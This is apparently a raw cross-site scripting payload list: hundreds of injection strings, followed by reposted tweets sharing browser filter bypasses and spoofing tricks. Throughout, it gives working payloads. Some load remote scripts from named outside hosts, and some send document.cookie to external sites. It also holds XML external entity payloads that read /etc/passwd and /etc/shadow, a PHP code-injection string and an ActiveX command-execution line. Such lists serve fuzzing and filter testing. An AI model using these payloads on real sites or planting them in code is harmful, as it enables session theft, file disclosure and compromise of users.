<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; | |
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; | |
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; | |
<;A HREF=";http://1113982867/";>;XSS<;/A>; | |
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; | |
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; | |
<;A HREF=";h
tt	p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; | |
<;A HREF=";//www.google.com/";>;XSS<;/A>; | |
<;A HREF=";//google";>;XSS<;/A>; | |
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; | |
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; | |
<;A HREF=";http://google.com/";>;XSS<;/A>; | |
<;A HREF=";http://www.google.com./";>;XSS<;/A>; | |
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; | |
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; | |
<script>document.vulnerable=true;</script> | |
<img SRC="jav ascript:document.vulnerable=true;"> | |
<img SRC="javascript:document.vulnerable=true;"> | |
<img SRC="  javascript:document.vulnerable=true;"> | |
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> | |
<<SCRIPT>document.vulnerable=true;//<</SCRIPT> | |
<script <B>document.vulnerable=true;</script> | |
<img SRC="javascript:document.vulnerable=true;" | |
<iframe src="javascript:document.vulnerable=true; < | |
<script>a=/XSS/\ndocument.vulnerable=true;</script> | |
\";document.vulnerable=true;;// | |
</title><SCRIPT>document.vulnerable=true;</script> | |
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> | |
<body BACKGROUND="javascript:document.vulnerable=true;"> | |
<body ONLOAD=document.vulnerable=true;> | |
<img DYNSRC="javascript:document.vulnerable=true;"> | |
<img LOWSRC="javascript:document.vulnerable=true;"> | |
<bgsound SRC="javascript:document.vulnerable=true;"> | |
<br SIZE="&{document.vulnerable=true}"> | |
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> | |
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> | |
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS | |
<img SRC='vbscript:document.vulnerable=true;'> | |
1script3document.vulnerable=true;1/script3 | |
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> | |
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> | |
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> | |
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> | |
<table BACKGROUND="javascript:document.vulnerable=true;"> | |
<table><TD BACKGROUND="javascript:document.vulnerable=true;"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> | |
<div STYLE="width: expression(document.vulnerable=true);"> | |
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> | |
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> | |
<XSS STYLE="xss:expression(document.vulnerable=true)"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> | |
<style TYPE="text/javascript">document.vulnerable=true;</style> | |
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> | |
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> | |
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> | |
<base HREF="javascript:document.vulnerable=true;//"> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> | |
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> | |
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> | |
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> | |
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> | |
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- | |
<a href="javascript#document.vulnerable=true;"> | |
<div onmouseover="document.vulnerable=true;"> | |
<img src="javascript:document.vulnerable=true;"> | |
<img dynsrc="javascript:document.vulnerable=true;"> | |
<input type="image" dynsrc="javascript:document.vulnerable=true;"> | |
<bgsound src="javascript:document.vulnerable=true;"> | |
&<script>document.vulnerable=true;</script> | |
&{document.vulnerable=true;}; | |
<img src=&{document.vulnerable=true;};> | |
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> | |
<iframe src="vbscript:document.vulnerable=true;"> | |
<img src="mocha:document.vulnerable=true;"> | |
<img src="livescript:document.vulnerable=true;"> | |
<a href="about:<script>document.vulnerable=true;</script>"> | |
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> | |
<body onload="document.vulnerable=true;"> | |
<div style="background-image: url(javascript:document.vulnerable=true;);"> | |
<div style="behaviour: url([link to code]);"> | |
<div style="binding: url([link to code]);"> | |
<div style="width: expression(document.vulnerable=true;);"> | |
<style type="text/javascript">document.vulnerable=true;</style> | |
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> | |
<style><!--</style><script>document.vulnerable=true;//--></script> | |
<<script>document.vulnerable=true;</script> | |
<![<!--]]<script>document.vulnerable=true;//--></script> | |
<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> | |
<img src="blah"onmouseover="document.vulnerable=true;"> | |
<img src="blah>" onmouseover="document.vulnerable=true;"> | |
<xml src="javascript:document.vulnerable=true;"> | |
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> | |
<div datafld="b" dataformatas="html" datasrc="#X"></div> | |
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> | |
<style>@import'http://www.securitycompass.com/xss.css';</style> | |
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> | |
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> | |
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> | |
<script SRC="http://www.securitycompass.com/xss.jpg"></script> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> | |
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script =">" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> | |
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> | |
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> | |
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> | |
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] | |
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; | |
<;/script>;<;script>;alert(1)<;/script>; | |
<;/br style=a:expression(alert())>; | |
<;scrscriptipt>;alert(1)<;/scrscriptipt>; | |
<;br size=\";&;{alert('XSS')}\";>; | |
perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out | |
perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> | |
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
<~/XSS STYLE=xss:expression(alert('XSS'))> | |
"><script>alert('XSS')</script> | |
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> | |
XSS STYLE=xss:e/**/xpression(alert('XSS'))> | |
</XSS STYLE=xss:expression(alert('XSS'))> | |
>"><script>alert("XSS")</script>& | |
"><STYLE>@import"javascript:alert('XSS')";</STYLE> | |
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> | |
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> | |
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' | |
"> | |
>" | |
'';!--"<XSS>=&{()} | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> | |
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> | |
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> | |
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> | |
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> | |
<IMG SRC="jav
ascript:alert(<WBR>'XSS');"> | |
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> | |
<script>alert('XSS')</script> | |
%3cscript%3ealert('XSS')%3c/script%3e | |
%22%3e%3cscript%3ealert('XSS')%3c/script%3e | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=javascript:alert('XSS')> | |
<img src=xss onerror=alert(1)> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<BODY ONLOAD=alert('XSS')> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
%253cscript%253ealert(1)%253c/script%253e | |
"><s"%2b"cript>alert(document.cookie)</script> | |
foo<script>alert(1)</script> | |
<scr<script>ipt>alert(1)</scr</script>ipt> | |
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<marquee onstart='javascript:alert('1');'>=(◕_◕)= | |
//VECTORS | |
< script > < / script> | |
< | |
< | |
< | |
< | |
< | |
<< | |
<<< | |
"><script>" | |
<script>alert("XSS")</script> | |
<<script>alert("XSS");//<</script> | |
<script>alert(document.cookie)</script> | |
'><script>alert(document.cookie)</script> | |
'><script>alert(document.cookie);</script> | |
";alert('XSS');// | |
%3cscript%3ealert("XSS");%3c/script%3e | |
%3cscript%3ealert(document.cookie);%3c%2fscript%3e | |
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E | |
<script>alert(document.cookie);</script> | |
<script>alert(document.cookie);<script>alert | |
<xss><script>alert('XSS')</script></vulnerable> | |
<IMG%20SRC='javascript:alert(document.cookie)'> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC="javascript:alert('XSS')" | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("'XSS'")`> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG%20SRC='javasc ript:alert(document.cookie)'> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="  javascript:alert('XSS');"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E | |
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script> | |
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} | |
'';!--"<XSS>=&{()} | |
<name>','')); phpinfo(); exit;/*</name> | |
<![CDATA[<script>var n=0;while(true){n;}</script>]]> | |
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> | |
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> | |
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
TWITTER @xssvector Tweets: | |
<img language=vbs src=<b onerror=alert#1/1#> | |
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.' | |
Reverse 401 basic auth phishing by @jackmasa POC: | |
document.domain='com' chrome/safari same domain suffix cross-domain trick. | |
Safari empty location bar bug by @jackmasa POC: | |
Safari location object pollution tech: by @kinugawamasato | |
Safari URL spoofing about://mmme.me POC: | |
Opera URL spoofing vuln data://mmme.me by @jackmasa POC: | |
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera | |
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F | |
Opera data:message/rfc822 #XSS by @insertScript | |
#IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe> | |
IE cool expression xss <div id="alert(/@0x6D6172696F/)" style="x:expression(eval)(id)"> | |
Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!-- by @cgvwzq | |
Bypass IE8 version flash docuemnt object protection by @jackmasa | |
Bypass IE all version flash docuemnt object protection by @gainover1 | |
Bypass IE9 flash docuemnt object protection by @irsdl | |
Bypass IE8 flash docuemnt object protection by @irsdl | |
New XSS vector (#Opera Specific) <sVg><scRipt %00>prompt(/@soaj1664ashar/) | |
IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day | |
<iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome | |
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day | |
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri | |
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox | |
<script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=> #IE | |
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato | |
Components.lookupMethod(self, 'alert')(1) #firefox | |
external.NavigateAndFind(' ',[],[]) #IE #URLredirect | |
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke | |
<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera | |
<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome | |
<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript | |
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox | |
<svg></ y="><x" onload=alert('@0x6D6172696F')> #svg | |
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera | |
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa | |
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake | |
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com | |
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa | |
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox | |
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa | |
<svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun | |
Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a> | |
<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style> | |
<!-- --!><input value="--><body/onload=`alert(/ @jackmasa /)//`"> #IE #XSS | |
Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it. | |
Firefox clipboard-hijack without script and css : http://<img alt="evil/#" width=0 height=0 > | |
<![<img src=x:x onerror=`alert(/ @jackmasa /)//`]--> | |
#E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes | |
#vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356 | |
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')() | |
No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe> | |
<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg> | |
#VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub] | |
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console | |
<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar | |
<![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa | |
<svg><script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa | |
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS | |
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS | |
header('Refresh: 0;url=javascript:alert(1)'); | |
<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::"> | |
<a href="data:text/html,<script>eval(name)</script>" target="alert(' @garethheyes @0x6D6172696F ')">click</a> | |
#CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style> | |
#ES #FF for(location of ['javascript:alert(/ff/)']); | |
#E4X function::['location']='javascript'':alert(/FF/)' | |
HTML5 entity char <a href="javas	cri
pt:alert(' @garethheyes ')">test</a> | |
#Firefox <a href="x:alert(1)" id="test">click</a> <script>eval(test'')</script> by @cgvwzq | |
<div style="color:rgb(''�x:expression(alert(URL=1))"></div> CSS and CSS :P | |
toUpperCase XSS document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase()) by @jackmasa | |
IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356 | |
aha <script src=>alert(/IE|Opera/)</script> | |
Opera bug? <img src=//\ onload=alert(1)> | |
Use 127.1 no 127.0.0.1 by @jackmasa | |
IE vector location='vbscript:alert(1)' | |
#jQuery super less-xss,work in IE: $(URL) 6 chars | |
#Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap | |
innerText DOM XSS: innerHTML=innerText | |
Using IE XSS filter or Chrome xss auditor to block <meta> url redirect. | |
jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>') | |
IE all version CSRF vector <img lowsrc=//google.com> | |
Timing vector <img src=//ixss.sinaapp.com/sleep.php> | |
Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"> | |
IE9 <script/onload=alert(1)></script> | |
Webkit and FF <style/onload=alert(1)> | |
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P | |
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">') | |
If you want to share your cool vector, please do not hesitate to let me know :) | |
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL | |
New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F | |
#Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes | |
JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke | |
JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr | |
ß=ss <a href="http://ß.lv">click</a> by @_cweb | |
<a href="http://www。example。com">click</a> by @_cweb | |
Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes | |
<a href="http://www﹒example﹒com ">click</a> by @_cweb | |
history.pushState([],[],'/xssvector') HTML5 URL spoofing! | |
Clickjacking with history.forward() and history.back() by @lcamtuf | |
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul | |
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356 | |
Firefox <img src=javascript:while([{}]);> | |
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115 | |
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes | |
IE breaking framebusting vector <script>var location={};</script> | |
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script> | |
Firefox <iframe src=view-source://xxxx.com>; with drag and drop | |
<button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking | |
Dangling markup injection <img src='//evil by @lcamtuf | |
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F | |
DOM clobbering:<form name=location > clobbered location object on IE. | |
DOM clobbering:<form name=document><image name=body> clobbered document->body | |
<isindex formaction=javascript:alert(1)> by @jackmasa | |
Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script> | |
Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes | |
<a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz | |
Opera <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa | |
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88 | |
Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz | |
FF <a href="//ⓜⓜⓜⓔ︒ⓜⓔ">click</a> url trick by @jackmasa | |
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat | |
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F | |
<a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_ | |
FF <img src="jar:!/"> no referrer by @sneak_ | |
No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa | |
<svg><style>*{font-family:'<svg onload=alert(1)>';}</style></svg> by @0x6D6172696F | |
JSLR( @garethheyes ) challenge result: | |
@irsdl challenge result: | |
<body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> Vbscript XHR by @masa141421356 | |
XML Entity XSS by @garethheyes | |
Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa | |
<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes | |
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke | |
<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D | |
<a href="#" onclick="alert(' ');alert(2 ')">name</a> Classic html entity inject vector | |
A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript | |
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F | |
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke | |
<meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato | |
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes | |
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa | |
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F | |
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes | |
FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F | |
<noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE | |
<svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F | |
Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne | |
<svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa | |
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa | |
FF <applet code=javascript:alert('sgl')> by @jackmasa | |
Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=‘’</script> by LeverOne | |
<script>RuntimeObject("w*")["window"]["alert"](1);</script> IE a new method get window object! by @s_hskz | |
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq | |
IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC: | |
<a href="javascript:alert(1)">click</a> non-IE | |
<a href="feed:javascript:alert(1)">click</a> Firefox | |
